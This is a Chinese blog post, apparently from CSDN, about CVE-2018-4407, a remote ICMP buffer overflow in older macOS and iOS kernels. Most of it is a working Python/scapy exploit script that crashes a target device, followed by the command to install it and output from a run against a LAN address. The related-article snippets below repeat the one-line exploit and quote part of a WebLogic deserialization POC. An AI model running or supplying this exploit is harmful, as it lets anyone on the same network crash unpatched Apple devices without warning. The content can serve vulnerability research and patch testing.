CVE-2018-4407 苹果设备远程溢出漏洞

最新推荐文章于 2025-08-05 09:00:00 发布
原创 最新推荐文章于 2025-08-05 09:00:00 发布 · 726 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

2018-10-30 公开了一个 Apple 设备的远程代码执行漏洞 CVE-2018-4407,该漏洞是收到畸形数据包后,向发送方报告错误,在构造 ICMP 数据包时发生了溢出,影响 macOS 10.13.6 及以下版本,iOS 11 及以下版本

python exp,能够造成让系统崩溃,代码如下:

# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
# from https://twitter.com/ihackbanme
import sys
try:
    from scapy.all import *
except Exception as e:
    print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
if __name__ == '__main__':
    try:
        check_ip = sys.argv[1]
        print ("[*] !!!!!!Dangerous operation!!!!!!")
        print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
        for i in range(8,20):
            send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
        print ("[*] Check Over!! ")
    except Exception as e:
        print "[*] usage: sudo python check_icmp_dos.py 127.0.0.1"

测试 exp 之前安装一下 scapy

sudo pip install scapy

然后开始见证奇迹:

$ sudo python ./icmp_ddos.py 192.168.2.238
Fontconfig warning: ignoring UTF-8: not a valid region tag
Fontconfig warning: ignoring UTF-8: not a valid region tag
[*] !!!!!!Dangerous operation!!!!!!
[*] Trying CVE-2018-4407 ICMP DOS 192.168.2.238
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
[*] Check Over!!

原文地址:https://www.exchen.net/apple_xnu_icmp_error_cve-2018-4407.html

微软最新 WiFi 远程代码执行漏洞CVE-2024-30078)探究
阿里技术
07-17 1847
从函数的名称 Dt11Translate80211ToEthernetNdisPacket 可以推测,这个函数用于处理 802.11 数据包。802.11 是一种无线局域网的标准,而 WiFi 是 802.11 标准的一种产品实现。用 IDA 反编译函数,发现补丁是增加了一处对数值的比较,如果不满足条件则返回 NDIS_STATUS_INVALID_PACKET(0xc001000),即数据包非法。调用层次图表明,函数会在接收到 802.11 数据包时被调用。
可蠕虫化AirPlay漏洞:公共Wi-Fi环境下可零点击远程控制苹果设备
FreeBuf_的博客
05-06 834
AirPlay漏洞可蠕虫化攻击,公共Wi-Fi下零点击控制苹果设备
CVE-2018-4407 POC
co0ontty的博客
12-21 354
CVE-2018-4407 POC import sys try: from scapy.all import * except Exception as e: print ("[*] You need install scapy first:\n[*] sudo pip install scapy ") if __name__ == '__main__': try: ...
CVE-2019-8660 苹果IMessage漏洞利用
@
08-01 1185
Google Project Zero研究人员在iOS操作系统中发现了多个漏洞,其中有 四个漏洞(CVE-2019-8660、CVE-2019-8662、CVE-2019-8647、CVE-2019-8641) 可造成无交互远程任意代码执行,一个漏洞可造成远程任意文件读取(CVE-201 9-8646) CVE-2019-8660此漏洞是存在于iOS Core Data框架以及Siri组件中的内...
CVE-2018-4407缓冲区溢出
Jiajiajiang_的博客
11-16 666
漏洞使得攻击者只要接入同一WIFI网络,即可向其他毫不知情的用户发送恶意数据包来触发Mac或IOS设备的崩溃和重启。由于该漏洞存在于系统网络核心代码,因此任何反病毒软件均无法防御。 易受攻击的设备: Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新20...
CVE-2018-4407(IOS缓冲区溢出漏洞)exp
weixin_30814223的博客
03-09 321
CVE-2018-4407为ios缓冲区溢出漏洞 exp: import scapyfrom scapy.all import * send(IP(dst="同一局域网内目标Ip",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)])) 漏洞范围: 运行以下操作系统的设...
Apple任意代码执行漏洞通告
爱国小白帽
07-27 1550
报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple发布了macOS、iOS、iPadOS远程代码执行漏洞的风险通告,漏洞编号为CVE-2021-30807,漏洞等级:高危,漏洞评分:8.5。 macOS、iOS、iPadOS是Apple公司的操作系统,在全球拥有庞大的用户基数。这些操作系统中的IOMobileFrameBuffer内核拓展中存在一处任意代码.
警惕!截止2024年Dell iDRAC 漏洞大曝光,您的远程管理是否安全?
最新发布
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
08-05 1212
警惕!截止2024年Dell iDRAC 漏洞大曝光,您的远程管理是否安全?
漏洞挖掘相关-信息收集
qq_59081708的博客
04-06 801
TCP端口20、21,20用于传输数据,21用于传输控制信息。
32种针对硬件与固件的漏洞攻击
dian66_ITO的博客
06-28 2706
2018年1月,全球计算机行业因为Meltdown以及Spectre这两个在处理器中存在的新型漏洞而受到威胁。这两个漏洞直接打破了分离内核以及用户内存的OS安全边界。这两个漏洞基于了现代CPU的预测执行功能,而缓解这两个漏洞带来的影响则需要有史以来最大的补丁计划,范围涉及CPU制造商、设备制造商以及操作系统供应商。 Meltdown和Spectre绝不是最早的硬件漏洞,但它们确实引起安全研究者开始注意这种类型的漏洞。从那时开始,许多学术界与私人领域的研究者,都开始研究CPU以及其他硬件组件的低阶运行情况,以
iOS11拒绝服务攻击
02-24
CVE-2018-4407是Kevin发现的XNU系统内核中的堆缓冲区溢出漏洞,Apple把它分为了远程代码执行漏洞,攻击者有可能利用缓冲区溢出进行远程代码执行。不过目前Kevin给出的PoC仅仅是造成系统崩溃重启。
kaggle-kernel packages
lzv2v的专栏
04-28 4452
TimeLine #Log Message 0.8s0Please wait a moment while I gather a list of all available modules... 1.1s1/opt/conda/lib/python3.6/site-packages/Bio/PopGen/Async/__init__.py:17: BiopythonDeprecat
Pycharm运行时,报编码错误
weixin_43992799的博客
07-14 1085
不知道改动了pycharn哪里的设置,导致只要print(“XXX吉祥”),带中文就会编码错误。后来上网找到在第一行加# -- coding: utf-8 -- 就可以运行了。后来知道,将又右下角的GBK格式改为utf-8也同样可以。 ...
mac安装启动fiddler报错‘ignoring UTF-8: not a valid region tag’
weixin_41633501的博客
05-29 1828
1. cd ~ 2. open .bash_profile 3. export LANG="en_US.UTF-8" export LC_COLLATE="en_US.UTF-8" export LC_CTYPE="en_US.UTF-8" export LC_MESSAGES="en_US.UTF-8" export LC_MONETARY="en_US.UTF-8" expo...
QT5编辑中文字符编译报错问题解决办法
无与才哥的专栏
02-17 4281
最近开始学习QT编程,发现还蛮好用的。就是中文字符的问题把我搞得头很大,一旦代码里面有中文字符,编译就会报错,于是乎到处找解决办法,无奈QT的资源好像有些少,幸得最终找到一个帖子,最后解决了,记录下。 帖子链接:http://bbs.qter.org/forum.php?mod=viewthread&tid=2296 用的是5.3.2,我的设置: Qt Creator环境设置:默认编码:UT
缓冲区溢出漏洞CVE-2018-4407)可导致内核崩溃,苹果多款操作系统均受影响
a1b2c3是弱口令
11-01 1117
漏洞使得攻击者只要接入同一Wi-Fi网络,即可向其他毫不知情的用户发送恶意数据包来触发任何Mac或iOS设备的崩溃和重启。由于该漏洞存在于系统网络核心代码,因此任何反病毒软件均无法防御。 运行以下操作系统的设备易受攻击: Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(...
osx 字体 linux,Linux/MacOS下matplotlib能正常显示的中文字体选择
weixin_29415667的博客
05-13 585
下面的Python脚本可以检测到 *nix 系统内 matplotlib 支持正常显示的中文字体(用到了命令行工具 fc-list ):#!/usr/bin/env python# -*- coding: utf-8 -*-# File Name: font_check.py# Created Time: Thu Mar 23 16:53:59 2017__author__ = 'minyu'__...
CVE-2018-4407 漏洞复现POC
weixin_30608131的博客
11-01 305
pip install scapy    import scapy from scapy.all import * send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))    转载于:https:...
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 7047
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值